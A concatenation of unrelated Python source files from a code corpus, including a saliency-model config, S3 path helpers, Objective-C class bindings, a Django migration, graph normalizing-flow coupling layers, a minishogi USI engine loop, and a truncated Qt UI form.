from timemachines.skatertools.evaluation.evaluators import hospital_mean_square_error
def test_dlm_auto_univariate():
print(hospital_mean_square_error(f=dlm_univariate_a, k=3, n=150, n_burn=44))
print(hospital_mean_square_error(f=dlm_univariate_r3, k=3, n=150, n_burn=44, r=0.53))
if __name__=='__main__':
test_dlm_auto_univariate()
|
StarcoderdataPython
|
3285222
|
<filename>saliency/Saliency_other_models/models/SAM_RESNET/config.py
#########################################################################
# MODEL PARAMETERS #
#########################################################################
# version (0 for SAM-VGG and 1 for SAM-ResNet)
version = 1
# batch size
b_s = 1
# number of rows of input images
shape_r = 240
# number of cols of input images
shape_c = 320
# number of rows of downsampled maps
shape_r_gt = 30
# number of cols of downsampled maps
shape_c_gt = 40
# number of rows of model outputs
shape_r_out = 480
# number of cols of model outputs
shape_c_out = 640
# final upsampling factor
upsampling_factor = 16
# number of epochs
nb_epoch = 10
# number of timestep
nb_timestep = 4
# number of learned priors
nb_gaussian = 16
#########################################################################
# TRAINING SETTINGS #
#########################################################################
# path of training images
imgs_train_path = '/path/to/training/images/'
# path of training maps
maps_train_path = '/path/to/training/maps/'
# path of training fixation maps
fixs_train_path = '/path/to/training/fixation/maps/'
# number of training images
nb_imgs_train = 10000
# path of validation images
imgs_val_path = '/path/to/validation/images/'
# path of validation maps
maps_val_path = '/path/to/validation/maps/'
# path of validation fixation maps
fixs_val_path = '/path/to/validation/fixation/maps/'
# number of validation images
nb_imgs_val = 5000
|
StarcoderdataPython
|
1767827
|
def find_bucket_key(s3_path):
"""
This is a helper function that given an s3 path such that the path is of
the form: bucket/key
It will return the bucket and the key represented by the s3 path
"""
s3_components = s3_path.split("/")
bucket = s3_components[0]
s3_key = ""
if len(s3_components) > 1:
s3_key = "/".join(s3_components[1:])
return bucket, s3_key
def split_s3_bucket_key(s3_path):
"""Split s3 path into bucket and key prefix.
This will also handle the s3:// prefix.
:return: Tuple of ('bucketname', 'keyname')
"""
if s3_path.startswith("s3://"):
s3_path = s3_path[5:]
return find_bucket_key(s3_path)
|
StarcoderdataPython
|
5059767
|
'''
Classes from the 'AGXMetalA10' framework.
'''
try:
from rubicon.objc import ObjCClass
except ValueError:
def ObjCClass(name):
return None
def _Class(name):
try:
return ObjCClass(name)
except NameError:
return None
AGXA10FamilyIndirectRenderCommandEncoder = _Class('AGXA10FamilyIndirectRenderCommandEncoder')
AGXA10FamilyComputeOrFragmentOrTileProgram = _Class('AGXA10FamilyComputeOrFragmentOrTileProgram')
AGXA10FamilyComputeProgram = _Class('AGXA10FamilyComputeProgram')
AGXA10FamilyFragmentProgram = _Class('AGXA10FamilyFragmentProgram')
AGXA10FamilyVertexProgram = _Class('AGXA10FamilyVertexProgram')
AGXA10FamilyWarpFunction = _Class('AGXA10FamilyWarpFunction')
AGXA10FamilyResourceGroup = _Class('AGXA10FamilyResourceGroup')
AGXMTLCounterSampleBuffer = _Class('AGXMTLCounterSampleBuffer')
AGXA10FamilyIndirectComputeCommandEncoder = _Class('AGXA10FamilyIndirectComputeCommandEncoder')
AGXTextureLayout = _Class('AGXTextureLayout')
AGXA10FamilyDepthStencilState = _Class('AGXA10FamilyDepthStencilState')
AGXA10FamilyRenderPipeline = _Class('AGXA10FamilyRenderPipeline')
AGXA10FamilyComputePipeline = _Class('AGXA10FamilyComputePipeline')
AGXA10FamilySampler = _Class('AGXA10FamilySampler')
AGXA10FamilyIndirectRenderCommand = _Class('AGXA10FamilyIndirectRenderCommand')
AGXA10FamilyFunctionHandle = _Class('AGXA10FamilyFunctionHandle')
AGXA10FamilyRasterizationRateMap = _Class('AGXA10FamilyRasterizationRateMap')
AGXA10FamilyIndirectArgumentBufferLayout = _Class('AGXA10FamilyIndirectArgumentBufferLayout')
AGXA10FamilyIndirectComputeCommand = _Class('AGXA10FamilyIndirectComputeCommand')
AGXPrincipalDevice = _Class('AGXPrincipalDevice')
AGXA10FamilySparseHeap = _Class('AGXA10FamilySparseHeap')
AGXA10FamilyHeap = _Class('AGXA10FamilyHeap')
AGXA10FamilyCommandQueue = _Class('AGXA10FamilyCommandQueue')
AGXA10FamilyThreadedRenderPass = _Class('AGXA10FamilyThreadedRenderPass')
AGXA10FamilyDynamicLibrary = _Class('AGXA10FamilyDynamicLibrary')
AGXA10FamilyBinaryArchive = _Class('AGXA10FamilyBinaryArchive')
AGXA10FamilyIndirectArgumentEncoder = _Class('AGXA10FamilyIndirectArgumentEncoder')
AGXA10FamilyCommandBuffer = _Class('AGXA10FamilyCommandBuffer')
AGXA10FamilyResourceStateContext = _Class('AGXA10FamilyResourceStateContext')
AGXA10FamilyRenderContext = _Class('AGXA10FamilyRenderContext')
AGXA10FamilySampledRenderContext = _Class('AGXA10FamilySampledRenderContext')
AGXA10FamilyComputeContext = _Class('AGXA10FamilyComputeContext')
AGXA10FamilySampledComputeContext = _Class('AGXA10FamilySampledComputeContext')
AGXA10FamilyBlitContext = _Class('AGXA10FamilyBlitContext')
AGXA10FamilyDebugContext = _Class('AGXA10FamilyDebugContext')
AGXTexture = _Class('AGXTexture')
AGXA10FamilyTexture = _Class('AGXA10FamilyTexture')
AGXA10FamilyIndirectCommandBuffer = _Class('AGXA10FamilyIndirectCommandBuffer')
AGXBuffer = _Class('AGXBuffer')
AGXA10FamilyVisibleFunctionTable = _Class('AGXA10FamilyVisibleFunctionTable')
AGXA10FamilyBuffer = _Class('AGXA10FamilyBuffer')
AGXA10FamilyDevice = _Class('AGXA10FamilyDevice')
AGXA10XDevice = _Class('AGXA10XDevice')
AGXA10Device = _Class('AGXA10Device')
|
StarcoderdataPython
|
9623295
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
]
operations = [
migrations.CreateModel(
name='OnedenAliment',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('name', models.CharField(max_length=250)),
('calories', models.DecimalField(max_digits=7, decimal_places=2)),
('proteins', models.DecimalField(max_digits=7, decimal_places=2)),
('fats', models.DecimalField(max_digits=7, decimal_places=2)),
('carbohydrates', models.DecimalField(max_digits=7, decimal_places=2)),
('fibres', models.DecimalField(max_digits=7, decimal_places=2)),
('unit_quantity', models.DecimalField(max_digits=7, decimal_places=2)),
('additional', models.TextField()),
],
),
migrations.CreateModel(
name='OnedenCategory',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('name', models.CharField(max_length=100)),
],
),
migrations.AddField(
model_name='onedenaliment',
name='category',
field=models.ForeignKey(to='parsers.OnedenCategory'),
),
migrations.AlterUniqueTogether(
name='onedenaliment',
unique_together=set([('category', 'name')]),
),
]
|
StarcoderdataPython
|
6495010
|
import torch
import torch.nn as nn
import torch.nn.functional as F
from mflow.models.basic import GraphLinear, GraphConv, ActNorm, ActNorm2D
# class AffineCoupling(nn.Module):
# def __init__(self, in_channel, hidden_channels, affine=True): # filter_size=512, --> hidden_channels =(512, 512)
# super(AffineCoupling, self).__init__()
#
# self.affine = affine
# self.layers = nn.ModuleList()
# self.norms = nn.ModuleList()
# # self.norms_in = nn.ModuleList()
# last_h = in_channel // 2
# if affine:
# vh = tuple(hidden_channels) + (in_channel,)
# else:
# vh = tuple(hidden_channels) + (in_channel // 2,)
#
# for h in vh:
# self.layers.append(nn.Conv2d(last_h, h, kernel_size=3, padding=1))
# self.norms.append(nn.BatchNorm2d(h)) #, momentum=0.9 may change norm later, where to use norm? for the residual? or the sum
# # self.norms.append(ActNorm(in_channel=h, logdet=False)) # similar but not good
# last_h = h
#
# def forward(self, input):
# in_a, in_b = input.chunk(2, 1) # (2,12,32,32) --> (2,6,32,32), (2,6,32,32)
#
# if self.affine:
# # log_s, t = self.net(in_a).chunk(2, 1) # (2,12,32,32) --> (2,6,32,32), (2,6,32,32)
# s, t = self._s_t_function(in_a)
# out_b = (in_b + t) * s # different affine bias , no difference to the log-det # (2,6,32,32) More stable, less error
# # out_b = in_b * s + t
# logdet = torch.sum(torch.log(torch.abs(s)).view(input.shape[0], -1), 1)
#
# else: # add coupling
# # net_out = self.net(in_a)
# _, t = self._s_t_function(in_a)
# out_b = in_b + t
# logdet = None
#
# return torch.cat([in_a, out_b], 1), logdet
#
# def reverse(self, output):
# out_a, out_b = output.chunk(2, 1)
#
# if self.affine:
# s, t = self._s_t_function(out_a)
# in_b = out_b / s - t # More stable, less error s must not equal to 0!!!
# # in_b = (out_b - t) / s
# else:
# _, t = self._s_t_function(out_a)
# in_b = out_b - t
#
# return torch.cat([out_a, in_b], 1)
#
# def _s_t_function(self, x):
# h = x
# for i in range(len(self.layers)-1):
# h = self.layers[i](h)
# h = self.norms[i](h)
# # h = torch.tanh(h) # tanh may be more stable?
# h = torch.relu(h) #
# h = self.layers[-1](h)
#
# s = None
# if self.affine:
# # residual net for doubling the channel. Do not use residual, unstable
# log_s, t = h.chunk(2, 1)
# # s = torch.sigmoid(log_s + 2) # (2,6,32,32) # s != 0 and t can be arbitrary : Why + 2??? more stable, keep s != 0!!! exp is not stable
# s = torch.sigmoid(log_s) # works good when actnorm
# # s = torch.tanh(log_s) # can not use tanh
# # s = torch.sign(log_s) # lower reverse error if no actnorm, similar results when have actnorm
#
# else:
# t = h
# return s, t
class AffineCoupling(nn.Module): # delete
def __init__(self, in_channel, hidden_channels, affine=True, mask_swap=False): # filter_size=512, --> hidden_channels =(512, 512)
super(AffineCoupling, self).__init__()
self.affine = affine
self.layers = nn.ModuleList()
self.norms = nn.ModuleList()
self.mask_swap=mask_swap
# self.norms_in = nn.ModuleList()
last_h = in_channel // 2
if affine:
vh = tuple(hidden_channels) + (in_channel,)
else:
vh = tuple(hidden_channels) + (in_channel // 2,)
for h in vh:
self.layers.append(nn.Conv2d(last_h, h, kernel_size=3, padding=1))
self.norms.append(nn.BatchNorm2d(h)) # , momentum=0.9 may change norm later, where to use norm? for the residual? or the sum
# self.norms.append(ActNorm(in_channel=h, logdet=False)) # similar but not good
last_h = h
def forward(self, input):
in_a, in_b = input.chunk(2, 1) # (2,12,32,32) --> (2,6,32,32), (2,6,32,32)
if self.mask_swap:
in_a, in_b = in_b, in_a
if self.affine:
# log_s, t = self.net(in_a).chunk(2, 1) # (2,12,32,32) --> (2,6,32,32), (2,6,32,32)
s, t = self._s_t_function(in_a)
out_b = (in_b + t) * s # different affine bias , no difference to the log-det # (2,6,32,32) More stable, less error
# out_b = in_b * s + t
logdet = torch.sum(torch.log(torch.abs(s)).view(input.shape[0], -1), 1)
else: # add coupling
# net_out = self.net(in_a)
_, t = self._s_t_function(in_a)
out_b = in_b + t
logdet = None
if self.mask_swap:
result = torch.cat([out_b, in_a], 1)
else:
result = torch.cat([in_a, out_b], 1)
return result, logdet
def reverse(self, output):
out_a, out_b = output.chunk(2, 1)
if self.mask_swap:
out_a, out_b = out_b, out_a
if self.affine:
s, t = self._s_t_function(out_a)
in_b = out_b / s - t # More stable, less error s must not equal to 0!!!
# in_b = (out_b - t) / s
else:
_, t = self._s_t_function(out_a)
in_b = out_b - t
if self.mask_swap:
result = torch.cat([in_b, out_a], 1)
else:
result = torch.cat([out_a, in_b], 1)
return result
def _s_t_function(self, x):
h = x
for i in range(len(self.layers)-1):
h = self.layers[i](h)
h = self.norms[i](h)
# h = torch.tanh(h) # tanh may be more stable?
h = torch.relu(h) #
h = self.layers[-1](h)
s = None
if self.affine:
# residual net for doubling the channel. Do not use residual, unstable
log_s, t = h.chunk(2, 1)
# s = torch.sigmoid(log_s + 2) # (2,6,32,32) # s != 0 and t can be arbitrary : Why + 2??? more stable, keep s != 0!!! exp is not stable
s = torch.sigmoid(log_s) # works good when actnorm
# s = torch.tanh(log_s) # can not use tanh
# s = torch.sign(log_s) # lower reverse error if no actnorm, similar results when have actnorm
else:
t = h
return s, t
class GraphAffineCoupling(nn.Module):
def __init__(self, n_node, in_dim, hidden_dim_dict, masked_row, affine=True):
super(GraphAffineCoupling, self).__init__()
self.n_node = n_node
self.in_dim = in_dim
self.hidden_dim_dict = hidden_dim_dict
self.masked_row = masked_row
self.affine = affine
self.hidden_dim_gnn = hidden_dim_dict['gnn']
self.hidden_dim_linear = hidden_dim_dict['linear']
self.net = nn.ModuleList()
self.norm = nn.ModuleList()
last_dim = in_dim
for out_dim in self.hidden_dim_gnn: # What if use only one gnn???
self.net.append(GraphConv(last_dim, out_dim))
self.norm.append(nn.BatchNorm1d(n_node)) # , momentum=0.9 Change norm!!!
# self.norm.append(ActNorm2D(in_dim=n_node, logdet=False))
last_dim = out_dim
self.net_lin = nn.ModuleList()
self.norm_lin = nn.ModuleList()
for out_dim in self.hidden_dim_linear: # What if use only one gnn???
self.net_lin.append(GraphLinear(last_dim, out_dim))
self.norm_lin.append(nn.BatchNorm1d(n_node)) # , momentum=0.9 Change norm!!!
# self.norm_lin.append(ActNorm2D(in_dim=n_node, logdet=False))
last_dim = out_dim
if affine:
self.net_lin.append(GraphLinear(last_dim, in_dim*2))
else:
self.net_lin.append(GraphLinear(last_dim, in_dim))
self.scale = nn.Parameter(torch.zeros(1)) # nn.Parameter(torch.ones(1)) #
mask = torch.ones(n_node, in_dim)
mask[masked_row, :] = 0 # masked_row are kept same, and used for _s_t for updating the left rows
self.register_buffer('mask', mask)
def forward(self, adj, input):
masked_x = self.mask * input
s, t = self._s_t_function(adj, masked_x) # s must not equal to 0!!!
if self.affine:
out = masked_x + (1-self.mask) * (input + t) * s
# out = masked_x + (1-self.mask) * (input * s + t)
logdet = torch.sum(torch.log(torch.abs(s)).view(input.shape[0], -1), 1) # possibly wrong answer
else: # add coupling
out = masked_x + t*(1-self.mask)
logdet = None
return out, logdet
def reverse(self, adj, output):
masked_y = self.mask * output
s, t = self._s_t_function(adj, masked_y)
if self.affine:
input = masked_y + (1 - self.mask) * (output / s - t)
# input = masked_x + (1 - self.mask) * ((output-t) / s)
else:
input = masked_y + (1 - self.mask) * (output - t)
return input
def _s_t_function(self, adj, x):
# adj: (2,4,9,9) x: # (2,9,5)
s = None
h = x
for i in range(len(self.net)):
h = self.net[i](adj, h) # (2,1,9,hidden_dim)
h = self.norm[i](h)
# h = torch.tanh(h) # tanh may be more stable
h = torch.relu(h) # use relu!!!
for i in range(len(self.net_lin)-1):
h = self.net_lin[i](h) # (2,1,9,hidden_dim)
h = self.norm_lin[i](h)
# h = torch.tanh(h)
h = torch.relu(h)
h = self.net_lin[-1](h)
# h =h * torch.exp(self.scale*2)
if self.affine:
log_s, t = h.chunk(2, dim=-1)
# x = sigmoid(log_x+bias): glow code Top 1 choice, keep s away from 0, s!!!!= 0 always safe!!!
# And get the signal from added noise in the input
# s = torch.sigmoid(log_s + 2)
s = torch.sigmoid(log_s) # better validity + actnorm
# s = torch.tanh(log_s) # Not stable when s =0 for synthesis data, but works well for real data in best case....
# s = torch.sign(s)
# s = torch.sign(log_s)
# s = F.softplus(log_s) # negative nll
# s = torch.sigmoid(log_s) # little worse than +2, # *self.scale #!!! # scale leads to nan results
# s = torch.tanh(log_s+2) # not that good
# s = torch.relu(log_s) # nan results
# s = log_s # nan results
# s = torch.exp(log_s) # nan results
else:
t = h
return s, t
def test_AffineCoupling():
from mflow.models.model import rescale_adj
torch.manual_seed(0)
bs = 2
nodes = 9
ch = 5
num_edge_type = 4
# x = torch.ones((bs, nodes, ch), dtype=torch.float32) # 2 for duplicated flow for transforming whole info
adj = torch.randint(0, 2, (bs, num_edge_type, nodes, nodes), dtype=torch.float32)
# adj = rescale_adj(adj)
gc = AffineCoupling(in_channel=4, hidden_channels={512,512}, affine=True)
out = gc(adj)
print('adj.shape:', adj.shape)
# print('out', out.shape) # (bs, out_ch)
print(out[0].shape, out[1].shape)
r = gc.reverse(out[0])
print(r.shape)
print(r)
print('torch.abs(r-adj).mean():', torch.abs(r - adj).mean())
def test_GraphAffineCoupling():
from mflow.models.model import rescale_adj
torch.manual_seed(0)
bs = 2
nodes = 9
ch = 5
num_edge_type = 4
# x = torch.ones((bs, nodes, ch), dtype=torch.float32) # 2 for duplicated flow for transforming whole info
x = torch.randint(0, 2, (bs, nodes, ch), dtype=torch.float32)
adj = torch.randint(0, 2, (bs, num_edge_type, nodes, nodes), dtype=torch.float32)
adj = rescale_adj(adj)
in_dim = ch # 5
hidden_dim_dict = {'gnn': [8, 64], 'linear':[8]}
gc = GraphAffineCoupling(nodes, in_dim, hidden_dim_dict, masked_row=range(0, nodes, 2), affine=True)
# (num_nodes=nodes, num_relations=num_edge_type, num_features=ch, mask=mask,
# batch_norm=True,
# num_masked_cols=1, ch_list=[256, 256])
out = gc(adj, x)
print('in', x.shape, adj.shape)
# print('out', out.shape) # (bs, out_ch)
print(out[0].shape, out[1].shape)
print(out)
r = gc.reverse(adj, out[0])
print(r)
print(r.shape)
print('torch.abs(r-x).mean():', torch.abs(r - x).mean())
if __name__ == '__main__':
# test_AdditiveAdjCoupling()
# test_AdditiveNodeFeatureCoupling()
# test_GraphAffineCoupling()
test_AffineCoupling()
|
StarcoderdataPython
|
11316282
|
import minishogilib
import numpy as np
import os
from optparse import OptionParser
import sys
import tensorflow as tf
import threading
import mcts
import network
class USI:
def __init__(self, weight_file):
self.weight_file = weight_file
self.nn = None
self.search = None
self.option = {
'ponder': False,
'softmax_sampling_moves': 30
}
def isready(self):
if self.nn is None:
self.nn = network.Network()
if self.weight_file is not None:
self.nn.load(self.weight_file)
self.config = mcts.Config()
self.config.simulation_num = int(1e9)
self.config.reuse_tree = True
if self.search is None:
self.search = mcts.MCTS(self.config)
self.search.clear()
self.position = minishogilib.Position()
# ponder
self.ponder_thread = None
def start(self):
while True:
line = input()
if not line:
continue
command = line.split()
if command[0] == 'usi':
print('id name erweitern_55')
print('id author nyashiki')
print('usiok')
elif command[0] == 'setoption':
key = command[2]
value = command[4]
if value == 'true' or value == 'True':
value = True
elif value == 'false' or value == 'False':
value = False
elif value.isdigit():
value = int(value)
self.option[key.lower()] = value
elif command[0] == 'position':
self.ponder_stop()
if command[1] == 'sfen':
sfen_kif = ' '.join(command[2:])
self.position.set_sfen(sfen_kif)
elif command[1] == 'startpos':
self.position.set_start_position()
else:
print('ERROR: Unknown protocol.')
elif command[0] == 'isready':
self.isready()
print('readyok')
elif command[0] == 'usinewgame':
pass
elif command[0] == 'go':
timelimit = {}
for (i, val) in enumerate(command):
if val == 'btime':
timelimit['btime'] = int(command[i + 1])
elif val == 'wtime':
timelimit['wtime'] = int(command[i + 1])
elif val == 'byoyomi':
timelimit['byoyomi'] = int(command[i + 1])
moves = self.position.generate_moves()
if len(moves) == 0:
print('bestmove resign')
else:
checkmate, checkmate_move = self.position.solve_checkmate_dfs(
7)
if checkmate:
best_move = checkmate_move
else:
remain_time = timelimit['btime'] if self.position.get_side_to_move(
) == 0 else timelimit['wtime']
think_time = remain_time // 10
if think_time < timelimit['byoyomi']:
think_time = remain_time + timelimit['byoyomi']
print('info string think time {}'.format(
think_time), flush=True)
root = self.search.run(
self.position, self.nn, think_time, True)
if self.position.get_ply() < self.option['softmax_sampling_moves']:
best_move = self.search.softmax_sample_among_top_moves(
root)
else:
best_move = self.search.best_move(root)
print('bestmove {}'.format(best_move), flush=True)
self.position.do_move(best_move)
self.ponder_start()
elif command[0] == 'd':
self.position.print()
elif command[0] == 'quit':
os._exit(0)
else:
print('ERROR: Unknown command.', command[0])
def ponder_start(self):
"""
position: This position turn should be the other player's.
"""
self.ponder_thread = threading.Thread(
target=self.search.run, args=(self.position, self.nn, 0, True, not self.option['ponder']))
self.ponder_thread.start()
def ponder_stop(self):
if self.ponder_thread is not None:
self.search.stop()
self.ponder_thread.join()
self.ponder_thread = None
if __name__ == '__main__':
parser = OptionParser()
parser.add_option('-w', '--weight_file', dest='weight_file',
default=None, help='Weights of neural network parameters')
(options, args) = parser.parse_args()
usi = USI(options.weight_file)
usi.start()
|
StarcoderdataPython
|
5167400
|
def aVeryBigSum(ar):
# Write your code here
for x in ar:
x = sum(ar)
return x
ar = [1000000001, 1000000002, 1000000003, 1000000004, 1000000005]
print(aVeryBigSum(ar))
# print(ar)
|
StarcoderdataPython
|
3425576
|
# -*- coding: utf-8 -*-
from crosspm.helpers.locker import Locker
class Usedby(Locker):
def __init__(self, config, do_load, recursive):
# Ignore do_load flag
super(Usedby, self).__init__(config, False, recursive)
def usedby_packages(self, deps_file_path=None, depslock_file_path=None, packages=None):
"""
Lock packages. Downloader search packages
"""
if deps_file_path is None:
deps_file_path = self._deps_path
if depslock_file_path is None:
depslock_file_path = self._depslock_path
if deps_file_path == depslock_file_path:
depslock_file_path += '.lock'
if packages is None:
self.search_dependencies(deps_file_path)
else:
self._root_package.packages = packages
self._log.info('Done!')
def search_dependencies(self, depslock_file_path):
self._log.info('Check dependencies ...')
self._root_package.find_usedby(depslock_file_path, property_validate=True)
self._log.info('')
def entrypoint(self, *args, **kwargs):
self.usedby_packages(*args, **kwargs)
|
StarcoderdataPython
|
132828
|
# -*- coding: utf-8 -*-
from ..vendor import Qt
from ..vendor.Qt import QtCore, QtGui, QtWidgets
class Ui_Form(object):
def setupUi(self, Form):
Form.setObjectName("Form")
Form.resize(556, 258)
Form.setMinimumSize(QtCore.QSize(0, 0))
self.gridLayout = QtWidgets.QGridLayout(Form)
self.gridLayout.setObjectName("gridLayout")
self.buttonbox = QtWidgets.QDialogButtonBox(Form)
self.buttonbox.setStandardButtons(QtWidgets.QDialogButtonBox.Cancel|QtWidgets.QDialogButtonBox.Ok)
self.buttonbox.setObjectName("buttonbox")
self.gridLayout.addWidget(self.buttonbox, 1, 0, 1, 1)
self.verticalLayout_5 = QtWidgets.QVBoxLayout()
self.verticalLayout_5.setContentsMargins(-1, 0, -1, -1)
self.verticalLayout_5.setObjectName("verticalLayout_5")
self.verticalLayout = QtWidgets.QVBoxLayout()
self.verticalLayout.setSizeConstraint(QtWidgets.QLayout.SetFixedSize)
self.verticalLayout.setContentsMargins(-1, 5, -1, 5)
self.verticalLayout.setObjectName("verticalLayout")
self.groupBox_2 = QtWidgets.QGroupBox(Form)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.groupBox_2.sizePolicy().hasHeightForWidth())
self.groupBox_2.setSizePolicy(sizePolicy)
self.groupBox_2.setMinimumSize(QtCore.QSize(0, 0))
self.groupBox_2.setObjectName("groupBox_2")
self.gridLayout_3 = QtWidgets.QGridLayout(self.groupBox_2)
self.gridLayout_3.setObjectName("gridLayout_3")
self.horizontalLayout_9 = QtWidgets.QHBoxLayout()
self.horizontalLayout_9.setSpacing(0)
self.horizontalLayout_9.setSizeConstraint(QtWidgets.QLayout.SetMaximumSize)
self.horizontalLayout_9.setContentsMargins(-1, 0, -1, 0)
self.horizontalLayout_9.setObjectName("horizontalLayout_9")
self.button_preview = QtWidgets.QHBoxLayout()
self.button_preview.setSizeConstraint(QtWidgets.QLayout.SetMaximumSize)
self.button_preview.setObjectName("button_preview")
self.horizontalLayout_9.addLayout(self.button_preview)
self.verticalLayout_2 = QtWidgets.QVBoxLayout()
self.verticalLayout_2.setSpacing(1)
self.verticalLayout_2.setSizeConstraint(QtWidgets.QLayout.SetMaximumSize)
self.verticalLayout_2.setContentsMargins(-1, 0, -1, 0)
self.verticalLayout_2.setObjectName("verticalLayout_2")
self.horizontalLayout_5 = QtWidgets.QHBoxLayout()
self.horizontalLayout_5.setSizeConstraint(QtWidgets.QLayout.SetDefaultConstraint)
self.horizontalLayout_5.setContentsMargins(-1, 0, -1, -1)
self.horizontalLayout_5.setObjectName("horizontalLayout_5")
spacerItem = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
self.horizontalLayout_5.addItem(spacerItem)
self.label_7 = QtWidgets.QLabel(self.groupBox_2)
self.label_7.setObjectName("label_7")
self.horizontalLayout_5.addWidget(self.label_7)
self.spinbox_btn_position_x = QtWidgets.QSpinBox(self.groupBox_2)
self.spinbox_btn_position_x.setMinimumSize(QtCore.QSize(70, 0))
self.spinbox_btn_position_x.setMaximumSize(QtCore.QSize(16777215, 16777215))
self.spinbox_btn_position_x.setMaximum(9999)
self.spinbox_btn_position_x.setObjectName("spinbox_btn_position_x")
self.horizontalLayout_5.addWidget(self.spinbox_btn_position_x)
self.label_6 = QtWidgets.QLabel(self.groupBox_2)
self.label_6.setObjectName("label_6")
self.horizontalLayout_5.addWidget(self.label_6)
self.spinbox_btn_position_y = QtWidgets.QSpinBox(self.groupBox_2)
self.spinbox_btn_position_y.setMinimumSize(QtCore.QSize(70, 0))
self.spinbox_btn_position_y.setMaximum(9999)
self.spinbox_btn_position_y.setObjectName("spinbox_btn_position_y")
self.horizontalLayout_5.addWidget(self.spinbox_btn_position_y)
self.verticalLayout_2.addLayout(self.horizontalLayout_5)
self.horizontalLayout_2 = QtWidgets.QHBoxLayout()
self.horizontalLayout_2.setContentsMargins(-1, 0, -1, -1)
self.horizontalLayout_2.setObjectName("horizontalLayout_2")
spacerItem1 = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
self.horizontalLayout_2.addItem(spacerItem1)
self.label = QtWidgets.QLabel(self.groupBox_2)
self.label.setObjectName("label")
self.horizontalLayout_2.addWidget(self.label)
self.spinbox_line_length = QtWidgets.QSpinBox(self.groupBox_2)
self.spinbox_line_length.setMinimumSize(QtCore.QSize(70, 0))
self.spinbox_line_length.setMaximum(9999)
self.spinbox_line_length.setObjectName("spinbox_line_length")
self.horizontalLayout_2.addWidget(self.spinbox_line_length)
self.verticalLayout_2.addLayout(self.horizontalLayout_2)
self.horizontalLayout_8 = QtWidgets.QHBoxLayout()
self.horizontalLayout_8.setContentsMargins(-1, 0, -1, -1)
self.horizontalLayout_8.setObjectName("horizontalLayout_8")
spacerItem2 = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
self.horizontalLayout_8.addItem(spacerItem2)
self.label_8 = QtWidgets.QLabel(self.groupBox_2)
self.label_8.setObjectName("label_8")
self.horizontalLayout_8.addWidget(self.label_8)
self.spinbox_line_width = QtWidgets.QSpinBox(self.groupBox_2)
self.spinbox_line_width.setMinimumSize(QtCore.QSize(70, 0))
self.spinbox_line_width.setMaximum(9999)
self.spinbox_line_width.setObjectName("spinbox_line_width")
self.horizontalLayout_8.addWidget(self.spinbox_line_width)
self.verticalLayout_2.addLayout(self.horizontalLayout_8)
self.horizontalLayout_11 = QtWidgets.QHBoxLayout()
self.horizontalLayout_11.setSpacing(6)
self.horizontalLayout_11.setContentsMargins(-1, 0, -1, -1)
self.horizontalLayout_11.setObjectName("horizontalLayout_11")
spacerItem3 = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
self.horizontalLayout_11.addItem(spacerItem3)
self.label_5 = QtWidgets.QLabel(self.groupBox_2)
self.label_5.setObjectName("label_5")
self.horizontalLayout_11.addWidget(self.label_5)
self.combo_style = QtWidgets.QComboBox(self.groupBox_2)
self.combo_style.setObjectName("combo_style")
self.combo_style.addItem("")
self.combo_style.addItem("")
self.horizontalLayout_11.addWidget(self.combo_style)
self.verticalLayout_2.addLayout(self.horizontalLayout_11)
self.horizontalLayout_3 = QtWidgets.QHBoxLayout()
self.horizontalLayout_3.setContentsMargins(-1, 0, -1, -1)
self.horizontalLayout_3.setObjectName("horizontalLayout_3")
spacerItem4 = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
self.horizontalLayout_3.addItem(spacerItem4)
self.label_4 = QtWidgets.QLabel(self.groupBox_2)
self.label_4.setObjectName("label_4")
self.horizontalLayout_3.addWidget(self.label_4)
self.spinbox_label_font_size = QtWidgets.QSpinBox(self.groupBox_2)
self.spinbox_label_font_size.setMinimumSize(QtCore.QSize(70, 0))
self.spinbox_label_font_size.setObjectName("spinbox_label_font_size")
self.horizontalLayout_3.addWidget(self.spinbox_label_font_size)
self.verticalLayout_2.addLayout(self.horizontalLayout_3)
self.horizontalLayout_4 = QtWidgets.QHBoxLayout()
self.horizontalLayout_4.setContentsMargins(-1, 0, -1, -1)
self.horizontalLayout_4.setObjectName("horizontalLayout_4")
spacerItem5 = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
self.horizontalLayout_4.addItem(spacerItem5)
self.checkbox_use_label = QtWidgets.QCheckBox(self.groupBox_2)
self.checkbox_use_label.setText("")
self.checkbox_use_label.setChecked(True)
self.checkbox_use_label.setObjectName("checkbox_use_label")
self.horizontalLayout_4.addWidget(self.checkbox_use_label)
self.label_label = QtWidgets.QLabel(self.groupBox_2)
self.label_label.setObjectName("label_label")
self.horizontalLayout_4.addWidget(self.label_label)
self.line_label = QtWidgets.QLineEdit(self.groupBox_2)
self.line_label.setObjectName("line_label")
self.horizontalLayout_4.addWidget(self.line_label)
self.verticalLayout_2.addLayout(self.horizontalLayout_4)
self.horizontalLayout_12 = QtWidgets.QHBoxLayout()
self.horizontalLayout_12.setContentsMargins(-1, -1, -1, 0)
self.horizontalLayout_12.setObjectName("horizontalLayout_12")
spacerItem6 = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
self.horizontalLayout_12.addItem(spacerItem6)
self.label_2 = QtWidgets.QLabel(self.groupBox_2)
self.label_2.setObjectName("label_2")
self.horizontalLayout_12.addWidget(self.label_2)
self.button_color = QtWidgets.QPushButton(self.groupBox_2)
self.button_color.setObjectName("button_color")
